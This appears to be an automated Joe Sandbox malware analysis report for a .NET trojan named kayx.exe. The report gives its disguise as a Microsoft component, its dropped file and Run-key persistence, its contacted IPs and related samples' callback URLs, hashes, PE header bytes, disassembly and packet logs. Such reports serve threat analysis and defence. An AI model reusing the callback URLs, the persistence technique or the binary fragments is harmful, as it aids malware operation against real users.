https://www.jiben.se/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb | mstsc.exe, 00000015.00000002.487573696.000000000543D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fonts.com | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmp | false
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.sakkal.comexplorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://crl.vexplorer.exe, 00000012.00000000.377196648.000000000F640000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
184.168.131.241 | unknown | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
198.185.159.141 | unknown | United States | 53831 | SQUARESPACEUS | false

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 321226
Start date: 20.11.2020
Start time: 16:30:50
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 37s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: kayx.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@14/3@4/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 24.8% (good quality ratio 23.3%)
• Quality average: 73.5%
• Quality standard deviation: 29.4%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.42.151.234, 104.43.139.144, 23.210.248.85, 51.104.144.132, 205.185.216.10, 205.185.216.42, 40.67.251.132, 20.54.26.129, 92.122.213.194, 92.122.213.247
• Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, par02p.wns.notify.windows.com.akadns.net, db5p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, skypedataprdcolwus16.cloudapp.net
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
16:32:44 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run firefoxe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe"
16:32:52 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run firefoxe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe"

Joe Sandbox View / Context

IPs

Match, then per row: Associated Sample Name / URL | Detection | Context

184.168.131.241
Payment Advice - Advice Ref GLV823990339.exe | malicious | www.crestviewlab.com/gyo3/?Ez=NAGhR2B897xHmSjBg9ib6asY38nnY4Q4yyZMB+Gj9us/EkxfPSnFK1AIwmtjw0HkqurxQu+N+g==&lhud=TjfdU2S
MV.KMTC JEBEL ALI_pdf.exe | malicious | www.carwashcustom.com/y9z/?uFQl=fY5jeAtp1RdNWaxm5n6iTAw0V/8P2zZ8OtxyEaiRQwZkZsJ+cMlcko/IfBrIT9W4DRCI&CTvp=fv10_lYhrxJtW6
PO0119-1620 LQSB 0320 Siemens.exe | malicious | www.fluidartindia.com/sppe/?DnadT=jX6zF4/w1i207zkr1riL1VOogE6y0WgJJqDlfpP213KajKiR8CXisvGZ1eNGgJa3LVxH&DxlLi=2dmX
PROOF OF PAYMENT.exe | malicious | www.fastsalvage.com/mua8/?nflpdH=B0qyrwayxD8wcQG3Qbr3RYD+R2QNZFulkGJHcFvF3VxCu8MwJpoGpma0wXvOyVIO8Q3D&w48t=0pY022IXUBwLfpfP
POSH XANADU Order-SP-20-V241e.xlsx | malicious | www.upgradetomastery.com/dtn/?8ptdvJ=KT0pXTAPFjE0&lb=VKiUsABvcSkQZcVKnfuC8vDN1G6FwU6V98eOKuQh0UKncmK0g9i99ZESG6mkSNKYPbsfxw==
jrzlwOa0UC.exe | malicious | www.enerjikbilin.com/t4vo/?Dxlpd=zukTNKzNObihvOlNQP8dibmkyr3w1VW9LXTzCAncEay1uwCtweD+d3+np2U01Umj+Zu9uG7hEQ==&lhuh=TxlhfFN
PDF ICITIUS33BUD10307051120003475.exe | malicious | www.applywithrand.com/iic6/?DV8TCr-=yPIpthC5MtqHoy4c0EHwGIh2/j/8JQggFFSPND+1HWd+sJXvHNRkMzNQskTglzxbquBo&U0DH6=kf50d0Dh3Z44mV
Invoice.exe | malicious | www.forsythcourtseniorliving.com/rhk/?2dtd9h=mjpPyjuxPhk0&3f=zT6q1JDKfhV2EvEX8/2jysHCuf0tBNhQsP2YiyzGtHytBzTfjT3OdZVqaOBr+/tLjoXCZ7lNZQ==
COMMERCIAL INVOICE BILL OF LADING DOC.exe | malicious | www.qubitlaboratories.com/o9b2/?J484=xPJtLXbX&u6u4=3LGybaBE5u/MmrsyhaNWg7uW/vPINQPoFsX0YN7a6o2wuLOqT6PUoiZZCA7i0eNZ3qK2
Invoice.exe | malicious | www.bitcoincandy.xyz/hko6/?7nE8Zrx=tXOddRziBZnyKXnXE9Kw2rrsPuH0SCZGoRNpDj1avThKGPBCs+LEjAOKKD9kUp/tb+4v&LXed=XPUxDVP8ThYHYxS0
ALPHA_PO_16201844580.exe | malicious | www.timberlinepallets.com/ihj8/?FDHH=Cnt+6nHyGXRUU+110cZEsnWWKj+9Yye+cLBJL0AmBtVe9ccrmOicj2d+yDCCaYm3sR4n&Rl=VtxXE
QFCPrfsJLeeYpN5.exe | malicious | www.outsourcedbim.com/k8b/
nnnf.exe | malicious | www.cheap-housekeeping.com/bns/?uVg8=DFuD2CwFEFTZMlFq3QqcpFj8rgjdPttxv8Nv7PXL+ekRjc0K8Zw+qc+ng0ER0qX/SACF&R48Hj=NtxpKjcxbp2XFTE
iz06VVmz0l.exe | malicious | www.maskupforschool.com/d8h/?rVOp32=b4AuRmO5mJIYTa03Ryq3knCjLs8pOUSKEouWqDiq2O5vgkJvPoAU5b8ioX3ikWgjFYnw&GV2p=8pMx2630Gf6TGP
0VikCnzrVT.exe | malicious | www.enerjikbilin.com/t4vo/?2db=X48HMfxHf&-Z8=zukTNKzNObihvOlNQP8dibmkyr3w1VW9LXTzCAncEay1uwCtweD+d3+np2UNqlGgwPy6uG7mXg==
New Additional Agreement - Commercial and Technical Proposal for Supply.exe | malicious | www.dentonparalegals.com/bw82/?tVm0=DrsoiajnQdnXVIU/gL2U5CLusm9v5BrmFGY2mUU9NwKfyFU9+RZid9vo/OyzH4K2w5lEorrqfA==&U4kp=Ntx4URGPjVrdVrx
Additional Agreement 2020-KYC.exe | malicious | www.dentonparalegals.com/bw82/?RR=DrsoiajnQdnXVIU/gL2U5CLusm9v5BrmFGY2mUU9NwKfyFU9+RZid9vo/OyzH4K2w5lEorrqfA==&E6A=8pMPQv
ORDER 20200717-019.exe | malicious | www.autokouluhaapalainen.com/svh9/?lZ3=fjnpVFfxOD2&D8S=sgrU0uWM3R9oNhmUUypjEsSXdQLL1THxdgQkCyVGvGZbR0orT1tg9H1luYchBJO1oel5jSmuSA==
http://149.129.50.37/ | malicious | www.proxywiki.org/pub/Support/FAQ/pwbtn.gif
PI210941.exe | malicious | www.enerjikbilin.com/t4vo/?o2J=zukTNKzNObihvOlNQP8dibmkyr3w1VW9LXTzCAncEay1uwCtweD+d3+np14O2VKY9uPs&4h0=vZR8DbS8Z4yXah

198.185.159.141
NEW PO.exe | malicious | www.pharmacymillwork.com/sbmh/?pPE=QetpKiLtmyz1LeM7dHiGsBNA/OD0ioqbSKhtijaCssQV8Cp1A0yk54z8I+AGFYuSeeOvrJLfeA==&-Zi=V48LDDzx
H4A2-423-EM154-302.exe | malicious | www.yourmatch.club/dn87/?D818=38AK/AHgtArI3vIGuczJM2geIxEZ/6YOh3hqbZK51swbGhAkUhePPwhzVXw1NVydmPq5&uTuD=ApdlgZ4

Domains

Match, then per row: Associated Sample Name / URL | Detection | Context

ext-sq.squarespace.com
BANK ACCOUNT INFO!.exe | malicious | 198.49.23.141
Purchase Order 40,7045.exe | malicious | 198.49.23.141
Payment Advice - Advice Ref GLV823990339.exe | malicious | 198.49.23.141
http://f69e.engage.squarespace-mail.com | malicious | 198.49.23.141
dB7XQuemMc.exe | malicious | 198.49.23.141
hRVrTsMv25.exe | malicious | 198.49.23.141
v6k2UHU2xk.exe | malicious | 198.185.159.141
NzI1oP5E74.exe | malicious | 198.49.23.141
PO.exe | malicious | 198.49.23.141
H4A2-423-EM154-302.exe | malicious | 198.185.159.141
KZ7qjnBlZF.exe | malicious | 198.49.23.141
scnn7676766.exe | malicious | 198.185.159.144
price quote.exe | malicious | 198.185.159.145
t64.exe | malicious | 198.185.159.144
Preview_Annual.xlsb | malicious | 198.49.23.145
Se adjunta un nuevo pedido.exe | malicious | 198.49.23.145
wPthy7dafVcH94f.exe | malicious | 198.49.23.144
54nwZp1aPg.exe | malicious | 198.49.23.144
uiy3OAYIpt.exe | malicious | 198.185.159.144
zisuzZpoW2.exe | malicious | 198.49.23.145

ASN

Match, then per row: Associated Sample Name / URL | Detection | Context

SQUARESPACEUS
BANK ACCOUNT INFO!.exe | malicious | 198.49.23.141
http://WWW.ALYSSA-J-MILANO.COM | malicious | 198.185.159.141
Payment Advice - Advice Ref GLV823990339.exe | malicious | 198.49.23.141
baf6b9fcec491619b45c1dd7db56ad3d.exe | malicious | 198.49.23.177
http://f69e.engage.squarespace-mail.com | malicious | 198.49.23.141
NEW PO.exe | malicious | 198.185.159.141
p8LV1eVFyO.exe | malicious | 198.49.23.177
dB7XQuemMc.exe | malicious | 198.49.23.141
hRVrTsMv25.exe | malicious | 198.49.23.141
qkN4OZWFG6.exe | malicious | 198.185.159.144
kvdYhqN3Nh.exe | malicious | 198.185.159.144
NzI1oP5E74.exe | malicious | 198.49.23.141
IQtvZjIdhN.exe | malicious | 198.49.23.177
PO.exe | malicious | 198.49.23.141
148wWoi8vI.exe | malicious | 198.49.23.177
H4A2-423-EM154-302.exe | malicious | 198.185.159.141
KZ7qjnBlZF.exe | malicious | 198.49.23.141
scnn7676766.exe | malicious | 198.185.159.144
price quote.exe | malicious | 198.185.159.145
t64.exe | malicious | 198.185.159.144

AS-26496-GO-DADDY-COM-LLCUS
PURCHASE ORDER.exe | malicious | 166.62.27.57
USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE | malicious | 192.186.237.168
BANK-STATMENT _xlsx.exe | malicious | 166.62.27.57
Purchase Order 40,7045.exe | malicious | 198.71.232.3
Payment Advice - Advice Ref GLV823990339.exe | malicious | 184.168.131.241
MV.KMTC JEBEL ALI_pdf.exe | malicious | 184.168.131.241
PO0119-1620 LQSB 0320 Siemens.exe | malicious | 184.168.131.241
PO#0007507_009389283882873PDF.exe | malicious | 192.186.237.168
http://homeschoolingteen.com | malicious | 107.180.51.106
http://p3nlhclust404.shr.prod.phx3.secureserver.net | malicious | 72.167.191.65
INQUIRY.exe | malicious | 166.62.27.57
moses.exe | malicious | 148.66.138.196
PROOF OF PAYMENT.exe | malicious | 184.168.131.241
baf6b9fcec491619b45c1dd7db56ad3d.exe | malicious | 184.168.131.241
https://j.mp/38NwiZZ | malicious | 107.180.26.71
POSH XANADU Order-SP-20-V241e.xlsx | malicious | 184.168.131.241
https://tg325.infusion-links.com/api/v1/click/5985883831533568/6575528038498304 | malicious | 198.71.233.138
https://tg325.infusion-links.com/api/v1/click/5985883831533568/6575528038498304 | malicious | 198.71.233.138
anthony.exe | malicious | 107.180.4.22
https://sailingfloridakeys.com/Guarantee/ | malicious | 104.238.92.18

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kayx.exe.log
Process: C:\Users\user\Desktop\kayx.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 425
Entropy (8bit): 5.340009400190196
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
MD5: CC144808DBAF00E03294347EADC8E779
SHA1: A3434FC71BA82B7512C813840427C687ADDB5AEA
SHA-256: 3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
SHA-512: A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe
Process: C:\Users\user\Desktop\kayx.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 432640
Entropy (8bit): 7.899249270813086
Encrypted: false
SSDEEP: 6144:2k6/GQOb8Jv8lhFf3cbXPFF7pnWtZBkPsMQ3GYYm5O3iMEbSpchQZd/l:2f/GDAJEn9crPFFFnWvLNBbSpZdd
MD5: A80E73A824B655491F54278B7A29467D
SHA1: F33DDFFC223C9AFA4E226D3567B990A8E44828E6
SHA-256: BDCD13ABDDED8F4F709FB288FB78B4AFFF486854B3EA78AD378D11220A31C3C4
SHA-512: 382DE45D9EFB0214BAEDDF26645A1858E5FF8A5090CFC1FCBCB552C03D69B1D0B78DE7833D7CEAFAFDE29CCF38B974E2D691EFF9249140BCB013E88EE15B482D
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 46%
Reputation: low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....z._.................L...L.......i... ........@.. ....................................@..................................i..J.......VI........................................................................... ............... ..H............text....J... ...L.................. ..`.rsrc...VI.......J...N..............@..@.reloc..............................@..B.................i......H.......@w...8......F...................................................N+.+.*(....+.(X...+...(....*.~....*..+......*.+..~....*..+......*.+...(....*..(....*..(....*..(....*..(....*..(....*..(....*..(....*..(....*.+.+.+.+.+...c+.*.+..+.(K...+..+..+.(K...+...+'{....{m...+.{}...+.. ...._+.{z...+..+.*.+..+..+..+..+.(....+..0..........8....{?...8....8....8....{@...1.8....{@.....+)8....{?...8....{@...Y8.....-6X ...._8.......,...-..Y...1#.{>... .....Y...(.....-...X...,"....{>.....Y.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe:Zone.Identifier
Process: C:\Users\user\Desktop\kayx.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Reputation: high, very likely benign file
Preview: [ZoneTransfer]....ZoneId=0

Static File Info

General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.899249270813086
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: kayx.exe
File size: 432640
MD5: a80e73a824b655491f54278b7a29467d
SHA1: f33ddffc223c9afa4e226d3567b990a8e44828e6
SHA256: bdcd13abdded8f4f709fb288fb78b4afff486854b3ea78ad378d11220a31c3c4
SHA512: 382de45d9efb0214baeddf26645a1858e5ff8a5090cfc1fcbcb552c03d69b1d0b78de7833d7ceafafde29ccf38b974e2d691eff9249140bcb013e88ee15b482d
SSDEEP: 6144:2k6/GQOb8Jv8lhFf3cbXPFF7pnWtZBkPsMQ3GYYm5O3iMEbSpchQZd/l:2f/GDAJEn9crPFFFnWvLNBbSpZdd
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....z._.................L...L.......i... ........@.. ....................................@................................

File Icon

Icon Hash: 031c185e1a2e4608

Static PE Info

General

Entrypoint: 0x4669fc
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x5FB67AE0 [Thu Nov 19 14:02:08 2020 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        Name | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x669b2 | 0x4a | .text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x68000 | 0x4956 | .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6e000 | 0xc | .reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                        Sections

                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                        .text | 0x2000 | 0x64a02 | 0x64c00 | False | 0.957082137872 | data | 7.94131868162 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rsrc | 0x68000 | 0x4956 | 0x4a00 | False | 0.173880912162 | data | 4.22602262855 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc | 0x6e000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        Name | RVA | Size | Type | Language | Country
                                        RT_ICON | 0x6806c | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4294440951, next used block 4294440951 | |
                                        RT_GROUP_ICON | 0x6c2d0 | 0x14 | data | |
                                        RT_VERSION | 0x6c320 | 0x410 | data | |
                                        RT_MANIFEST | 0x6c76c | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                        Imports

                                        DLL | Import
                                        mscoree.dll | _CorExeMain

                                        Version Infos

                                        Description | Data
                                        Translation | 0x0000 0x04b0
                                        LegalCopyright | Microsoft Corporation. All rights reserved.
                                        Assembly Version | 6.1.7601.23834
                                        InternalName | Vdltohs3.exe
                                        FileVersion | 6.1.7601.23834
                                        CompanyName | Microsoft Corporation
                                        Comments | Microsoft Help and Support
                                        ProductName | Microsoft Windows Operating System
                                        ProductVersion | 6.1.7601.23834
                                        FileDescription | Microsoft Help and Support
                                        OriginalFilename | Vdltohs3.exe

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Nov 20, 2020 16:33:34.725390911 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:34.833197117 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:34.833364964 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:34.833543062 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:34.939563990 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:34.942893982 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:34.942939043 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:34.942975044 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:34.943013906 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:34.943033934 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:34.943052053 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:34.943069935 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:34.943099976 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:34.943140984 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:34.943152905 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:34.943180084 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:34.943217993 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:34.943233013 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:34.943255901 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:34.943304062 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.049237967 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.049300909 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.049339056 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.049398899 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.049405098 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.049458027 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.049479961 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
                                        Nov 20, 2020 16:33:35.049498081 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.049535036 CET | 80 | 49743 | 198.185.159.141 | 192.168.2.3
                                        Nov 20, 2020 16:33:35.049559116 CET | 49743 | 80 | 192.168.2.3 | 198.185.159.141
